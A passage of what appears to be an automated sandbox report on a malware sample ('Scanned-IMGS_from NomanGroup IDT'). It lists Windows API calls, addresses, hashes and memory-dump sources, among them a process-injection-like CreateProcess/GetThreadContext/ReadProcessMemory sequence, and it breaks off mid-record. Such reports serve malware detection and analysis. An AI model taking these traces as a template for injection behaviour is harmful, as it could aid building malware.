                                                                                • Opcode ID: dc8dee81f49ce8fd17bcd1b0438ed9be92ada9b5d8fff9127f86f8566e498967
                                                                                • Instruction ID: 5220ed482f5407b49d237c55b34df547e405ade97d102bdbfef022d020e60072
                                                                                • Opcode Fuzzy Hash: dc8dee81f49ce8fd17bcd1b0438ed9be92ada9b5d8fff9127f86f8566e498967
                                                                                • Instruction Fuzzy Hash: 41F0283490020DB3CB10FA66E856CEE7B6C5F40314B60C17BB81C916D2FF39EA69C589
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004D82F5
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004D82FC
                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 004D84DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                • String ID:
                                                                                • API String ID: 146820519-0
                                                                                • Opcode ID: b458891f9da7acd71ad8b933259d941050e7ec315a45ba24dd3ae5cbb10173f8
                                                                                • Instruction ID: ac5f4a77e193a34b63539ac69ebc604f016c63268ebb59eecd779cd5de319072
                                                                                • Opcode Fuzzy Hash: b458891f9da7acd71ad8b933259d941050e7ec315a45ba24dd3ae5cbb10173f8
                                                                                • Instruction Fuzzy Hash: 06125A71A083419FC714DF28C494B2ABBE5BF85318F04895EE8898B352DB39ED45CF96
                                                                                APIs
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00451BF4
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00451BFC
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00451C07
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00451C12
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00451C1A
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00451C22
                                                                                  • Part of subcall function 00451B4A: RegisterWindowMessageW.USER32(00000004,?,004512C4), ref: 00451BA2
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0045136A
                                                                                • OleInitialize.OLE32 ref: 00451388
                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 004924AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 1986988660-0
                                                                                • Opcode ID: 69271b893cbdc8e795e9dacb0e5edc087d3e0a618cf964f531e4e2e0211c840d
                                                                                • Instruction ID: af38272d358302648d61d3e55cb7377ba26c97f0af2ec5e3653785c545e02c8c
                                                                                • Opcode Fuzzy Hash: 69271b893cbdc8e795e9dacb0e5edc087d3e0a618cf964f531e4e2e0211c840d
                                                                                • Instruction Fuzzy Hash: FE71A4B4A01A448E87A4DF7AA9856573AE0BFBA34571481BED40AC7272E734440BEF4D
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,004885CC,?,00518CC8,0000000C), ref: 00488704
                                                                                • GetLastError.KERNEL32(?,004885CC,?,00518CC8,0000000C), ref: 0048870E
                                                                                • __dosmaperr.LIBCMT ref: 00488739
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2583163307-0
                                                                                • Opcode ID: 71a1f6f2b23dc79ec7bc7eb4a5563044adddc391bc2dae2b8d7242c37dc129a5
                                                                                • Instruction ID: 356a3c93e517c8c4d6692af7eea8809ab1eaf1fb0300c6988788959f09af4ad1
                                                                                • Opcode Fuzzy Hash: 71a1f6f2b23dc79ec7bc7eb4a5563044adddc391bc2dae2b8d7242c37dc129a5
                                                                                • Instruction Fuzzy Hash: D0016B32A0526016C2307234688577F27594F92778F78091FFC14AB2D3EEAD9C82839C
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 004617F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CALL
                                                                                • API String ID: 1385522511-4196123274
                                                                                • Opcode ID: c16631baf9c16dd1017747c61b402fbe52ab9ef28b341d066764a09af67d8e91
                                                                                • Instruction ID: 10e9fc102b3395bf0d17a109ab266fdf0b4f2ec4b8cde5f4ddcce9dae578dd79
                                                                                • Opcode Fuzzy Hash: c16631baf9c16dd1017747c61b402fbe52ab9ef28b341d066764a09af67d8e91
                                                                                • Instruction Fuzzy Hash: 85228E746083419FC714DF15C480A2ABBF1BF96318F18895EF4968B362E739E845CB9B
                                                                                APIs
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00453908
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                • API String ID: 1144537725-0
                                                                                • Opcode ID: 95e534285d6c30a57fbb1856aa1cb269a7f67bbe4a953456d1f14b77794f2ce1
                                                                                • Instruction ID: a194c76246cf44fbb20a047d36fa0d4a6740170c72302b8bb6b697c6b90993b6
                                                                                • Opcode Fuzzy Hash: 95e534285d6c30a57fbb1856aa1cb269a7f67bbe4a953456d1f14b77794f2ce1
                                                                                • Instruction Fuzzy Hash: 3A31ABB05047009FD721EF24C884797BBE8FF6934AF00082EF99987241E775AA48CB5A
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0045949C,?,00008000), ref: 00455773
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0045949C,?,00008000), ref: 00494052
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 75554f7f6b60c566eee1e2f9ba8cf6f74f006ec25cc260133d6e2fda4d53b945
                                                                                • Instruction ID: 6a59bb58bbdbb774df2e3bce7d9d7b20860a496f8d97c8eb551585fb5d156f5f
                                                                                • Opcode Fuzzy Hash: 75554f7f6b60c566eee1e2f9ba8cf6f74f006ec25cc260133d6e2fda4d53b945
                                                                                • Instruction Fuzzy Hash: 6D019230145225B6E7300A2ACC4EFA77F98EF467B1F108311BE9C5E1E2C7B85855CB99
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01571FBB
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01572051
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01572073
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                • Instruction ID: 1842425dff04eb1edea9fb49c849e2dbe0daa92399b1ec0d99f7f45e496b9654
                                                                                • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                • Instruction Fuzzy Hash: 8612CD24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString
                                                                                • String ID:
                                                                                • API String ID: 2948472770-0
                                                                                • Opcode ID: 01488f938bb9973ca3890fee86f3ebac7d672feb01b0c577946b26e3d31847a8
                                                                                • Instruction ID: 75245c4c8cf406bdd3ecd79d7a2bdf86577935ea2a19f2bec762f6db601ba639
                                                                                • Opcode Fuzzy Hash: 01488f938bb9973ca3890fee86f3ebac7d672feb01b0c577946b26e3d31847a8
                                                                                • Instruction Fuzzy Hash: 5BD1AF34A04109EFCB14DF99C891DAEBBB5FF48314F14415BE805AB392E734AD86CB99
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 86b00d174548248aa95afb6964475937ed2d9b86294878e834b81985e9400cc0
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 46311674A00109DBD718CF59E48096AF7A2FF49300B2482A6E84ACF755E735EDC5CBC6
                                                                                APIs
                                                                                  • Part of subcall function 00454E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E9C
                                                                                  • Part of subcall function 00454E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00454EAE
                                                                                  • Part of subcall function 00454E90: FreeLibrary.KERNEL32(00000000,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454EC0
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454EFD
                                                                                  • Part of subcall function 00454E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E62
                                                                                  • Part of subcall function 00454E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00454E74
                                                                                  • Part of subcall function 00454E59: FreeLibrary.KERNEL32(00000000,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E87
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                • String ID:
                                                                                • API String ID: 2632591731-0
                                                                                • Opcode ID: 7f1896725e6cd02e8f20360d7be145f0021db3132b12ec6796fc009369927c22
                                                                                • Instruction ID: 7559ef5f32c1462cb249920424995085a12c2fae82e09cea11d34877515ad268
                                                                                • Opcode Fuzzy Hash: 7f1896725e6cd02e8f20360d7be145f0021db3132b12ec6796fc009369927c22
                                                                                • Instruction Fuzzy Hash: B011EB32600205ABCF14BF66DC53FAD77A59F8071AF10842FF942AE1C2DE789A499758
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: __wsopen_s
                                                                                • String ID:
                                                                                • API String ID: 3347428461-0
                                                                                • Opcode ID: 5ee07bfb49be4b8602c249d6db26edc0cd981134cc95ac10a3e076f3ce2d367d
                                                                                • Instruction ID: 707ff21fd283d62cfe94f01590eb69c08462ab8dc3b1f63ce7ea99ed47bfc7df
                                                                                • Opcode Fuzzy Hash: 5ee07bfb49be4b8602c249d6db26edc0cd981134cc95ac10a3e076f3ce2d367d
                                                                                • Instruction Fuzzy Hash: 5F11067690410AAFCB15DF58E94199E7BF5EF48314F14446AF808AB312EB31DA118BA9
                                                                                APIs
                                                                                  • Part of subcall function 00484C7D: RtlAllocateHeap.NTDLL(00000008,00451129,00000000,?,00482E29,00000001,00000364,?,?,?,0047F2DE,00483863,00521444,?,0046FDF5,?), ref: 00484CBE
                                                                                • _free.LIBCMT ref: 0048506C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction ID: c202ef4b9e2d26cd0327584cae1278bd1c6062fe32b6d3e85916b71baa9777c4
                                                                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction Fuzzy Hash: 2F014E722047055BE3319F59D84195EFBECFB86370F25091EE184932C0EB746805C778
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction ID: 2115e8e3ed21d20f8846de019e3ba887a20b6de552d706a6a26ecddba9e2821b
                                                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction Fuzzy Hash: 79F0F932511A1096C6313A678D05BDB379C9F66338F508B5FF429922D2DB7C940286AD
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000008,00451129,00000000,?,00482E29,00000001,00000364,?,?,?,0047F2DE,00483863,00521444,?,0046FDF5,?), ref: 00484CBE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 1cbd61374e82b1f98089d0cedae2ddb59e9a10f81f367000b12e99a66338d011
                                                                                • Instruction ID: 2a4a85afa66b5eb24e1000e387a29c3226d2440dd910ee0b3d00e96032746266
                                                                                • Opcode Fuzzy Hash: 1cbd61374e82b1f98089d0cedae2ddb59e9a10f81f367000b12e99a66338d011
                                                                                • Instruction Fuzzy Hash: 88F0BB3160222667DB217F629C05B5F774CAFD1760B168917B819972C1CB38D801579C
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: e74e59de187e105619b91972772a3327fd729fd0791e10f123f8721425958373
                                                                                • Instruction ID: d63d6ae5dcf8e424601dc8d0ea21ae216a44ab9bf72d0364f4a5f26442a11b8a
                                                                                • Opcode Fuzzy Hash: e74e59de187e105619b91972772a3327fd729fd0791e10f123f8721425958373
                                                                                • Instruction Fuzzy Hash: ADE0A02120122457D6313F679C05BAF36C9AF82FB2B150827B818A66C1DB299D0283AD
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454F6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 3dbda6d2fd20ab124da9210a4402cae117ed61e0d31c4b18bf1dea6d1e9ad21e
                                                                                • Instruction ID: d43e15464fd6c0844f66e967ed6465676f66fe105be293bc9392816981101b8b
                                                                                • Opcode Fuzzy Hash: 3dbda6d2fd20ab124da9210a4402cae117ed61e0d31c4b18bf1dea6d1e9ad21e
                                                                                • Instruction Fuzzy Hash: C6F03072105751CFDB349F69D490852B7F4AF5431E320897FE5DA8A612C7359888DF18
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0049EE51,00513630,00000002), ref: 004BCD26
                                                                                  • Part of subcall function 004BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,004BCD19,?,?,?), ref: 004BCC59
                                                                                  • Part of subcall function 004BCC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,004BCD19,?,?,?,?,0049EE51,00513630,00000002), ref: 004BCC6E
                                                                                  • Part of subcall function 004BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,004BCD19,?,?,?,?,0049EE51,00513630,00000002), ref: 004BCC7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: File$Pointer$Write
                                                                                • String ID:
                                                                                • API String ID: 3847668363-0
                                                                                • Opcode ID: 38bf6cd23a36ee2d7f913a48f96fbd955d553f354213bd8ac241954b33a0744a
                                                                                • Instruction ID: 33fdfe05a6d2cc7c0d457d668c5240bec0d089083e364cb5ba406ac0bc88cd2c
                                                                                • Opcode Fuzzy Hash: 38bf6cd23a36ee2d7f913a48f96fbd955d553f354213bd8ac241954b33a0744a
                                                                                • Instruction Fuzzy Hash: AEE0397A400604EFC7219F8AD9808AABBF8FF84260710852FE99682111D7B5AA14DBA0
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00452DC4
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                Memory Dump Source
